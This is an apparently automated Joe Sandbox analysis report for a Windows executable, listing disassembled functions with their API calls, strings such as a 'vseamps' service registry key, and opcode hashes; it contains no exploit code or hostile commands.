Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction ID: 5b7ad0c49c38066b794ca11de7a16eb3eba56c9870332f09a70d27c989218f90
Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction Fuzzy Hash: 6CD17232908B458EEB20EF6694403AD77A0FBA57A8F104175DE8D77B65CF38E499CB00

Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014000169E
HeapFree.KERNEL32 ref: 00000001400016B0
GetProcessHeap.KERNEL32 ref: 00000001400016C0
HeapFree.KERNEL32 ref: 00000001400016D2
GetProcessHeap.KERNEL32 ref: 00000001400016E2
HeapFree.KERNEL32 ref: 00000001400016F4
GetProcessHeap.KERNEL32 ref: 0000000140001704
HeapFree.KERNEL32 ref: 0000000140001716
GetProcessHeap.KERNEL32 ref: 0000000140001726
HeapFree.KERNEL32 ref: 0000000140001738

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601

Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014001371E
HeapFree.KERNEL32 ref: 0000000140013730
GetProcessHeap.KERNEL32 ref: 0000000140013740
HeapFree.KERNEL32 ref: 0000000140013752
GetProcessHeap.KERNEL32 ref: 0000000140013762
HeapFree.KERNEL32 ref: 0000000140013774
GetProcessHeap.KERNEL32 ref: 0000000140013784
HeapFree.KERNEL32 ref: 0000000140013796
GetProcessHeap.KERNEL32 ref: 00000001400137A6
HeapFree.KERNEL32 ref: 00000001400137B8

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601

Function 00007FFE1320B86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FFE1320B9E8
GetProcAddress.KERNEL32 ref: 00007FFE1320B9F4

Strings

api-ms-, xrefs: 00007FFE1320B932
ext-ms-, xrefs: 00007FFE1320B945

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction ID: f51b02e799573f56cd67867075af53494a7c37387b294582f87bf5fc47a8d0cb
Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction Fuzzy Hash: 5441E321B19E0289FA25EF17A9106BE2391BFA5BB0F084575DD4D777A4DE3CE409C740

Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32 ref: 0000000140002A3C
RegQueryValueExW.ADVAPI32 ref: 0000000140002A76
RegCloseKey.ADVAPI32 ref: 0000000140002A96
EnterCriticalSection.KERNEL32 ref: 0000000140002AAB
LeaveCriticalSection.KERNEL32 ref: 0000000140002B31

Strings

action, xrefs: 0000000140002A52
SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002A0D

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 1119674940-1966266597
Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00

Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004BE7
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004BF6
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C04
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C3E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C4D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C5B
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C8E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C9D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004CAB

GetComputerNameW.KERNEL32 ref: 0000000140001991
lstrlenW.KERNEL32 ref: 000000014000199C
GetProcessHeap.KERNEL32 ref: 00000001400019AB
HeapAlloc.KERNEL32 ref: 00000001400019B9

Strings

Security=impersonation static true, xrefs: 0000000140001952
ampIfEp, xrefs: 000000014000195E
ncalrpc, xrefs: 000000014000196D

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen$ComputerName
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3702919091-996641649
Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00

Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: ByteCharMultiWide$Info
String ID:
API String ID: 1775632426-0
Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700

Function 00007FFE1320712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FFE132072EB,?,?,?,00007FFE13203EC0,?,?,?,?,00007FFE13203CFD), ref: 00007FFE132071B1
GetLastError.KERNEL32(?,?,?,00007FFE132072EB,?,?,?,00007FFE13203EC0,?,?,?,?,00007FFE13203CFD), ref: 00007FFE132071BF
LoadLibraryExW.KERNEL32(?,?,?,00007FFE132072EB,?,?,?,00007FFE13203EC0,?,?,?,?,00007FFE13203CFD), ref: 00007FFE132071E9
FreeLibrary.KERNEL32(?,?,?,00007FFE132072EB,?,?,?,00007FFE13203EC0,?,?,?,?,00007FFE13203CFD), ref: 00007FFE13207257
GetProcAddress.KERNEL32(?,?,?,00007FFE132072EB,?,?,?,00007FFE13203EC0,?,?,?,?,00007FFE13203CFD), ref: 00007FFE13207263

Strings

api-ms-, xrefs: 00007FFE132071D1

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction ID: b1b605393add6a819cde189612f1031f811afda2d1040e313fea657fd63f7cf2
Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction Fuzzy Hash: 4031D221B1AF429DFE15AB0BA4005BD6394BFA9B70F590674ED1D273A1EE3CE449C300

Function 00007FFE13209444 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFE13209453
FlsGetValue.KERNEL32 ref: 00007FFE13209468
FlsSetValue.KERNEL32 ref: 00007FFE13209489
FlsSetValue.KERNEL32 ref: 00007FFE132094B6
FlsSetValue.KERNEL32 ref: 00007FFE132094C7
FlsSetValue.KERNEL32 ref: 00007FFE132094D8
SetLastError.KERNEL32 ref: 00007FFE132094F3

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction ID: 9c13dd64791026cb2d38728fdcee1a7ee9bdb1a945891c6419964660a8493107
Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction Fuzzy Hash: 77212C20B0CE824DFA65B723565113E55529FE4BB0F1447B4E93F36AF6DE6CE449C200

Function 00007FFE13210100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FFE13210131
GetLastError.KERNEL32 ref: 00007FFE1321013D
CloseHandle.KERNEL32 ref: 00007FFE13210155
CreateFileW.KERNEL32 ref: 00007FFE13210180
WriteConsoleW.KERNEL32 ref: 00007FFE1321019F

Strings

CONOUT$, xrefs: 00007FFE13210161

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction ID: d46568586f317830685a8f2b42987ef54e05f9a52d9b9c51f603404c8beb9f82
Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction Fuzzy Hash: 24117C21B18F418AE750AB57A94432972A0BBE9FF4F004274EA5EA7BA5CF3CD544C744

Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
CreateEventW.KERNEL32 ref: 00000001400012C0

Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3

SetServiceStatus.ADVAPI32 ref: 0000000140001302
WaitForSingleObject.KERNEL32 ref: 0000000140001312

Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

SetServiceStatus.ADVAPI32 ref: 000000014000134B

Strings

vseamps, xrefs: 000000014000127B

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
String ID: vseamps
API String ID: 3197017603-3944098904
Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00

Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON

Download Yara Rule

APIs

sprintf_s.LIBCMTD ref: 0000000140001233
MessageBoxW.USER32 ref: 0000000140001249

Strings

Help, xrefs: 0000000140001238
10:52:57, xrefs: 000000014000120F
usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy, xrefs: 000000014000121D
Jul 5 2019, xrefs: 0000000140001216

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Messagesprintf_s
String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
API String ID: 2642950106-3610746849
Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700

Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000000140002666
HeapFree.KERNEL32 ref: 0000000140002674
GetProcessHeap.KERNEL32 ref: 0000000140002683
HeapFree.KERNEL32 ref: 0000000140002691
GetProcessHeap.KERNEL32 ref: 00000001400026A0
HeapFree.KERNEL32 ref: 00000001400026AE
GetProcessHeap.KERNEL32 ref: 00000001400026BD
HeapFree.KERNEL32 ref: 00000001400026CB

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700

Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002986
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002994
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029A3
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029B1
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029C0
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029CE
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029DD
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029EB

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200

Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 319667368-0
Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
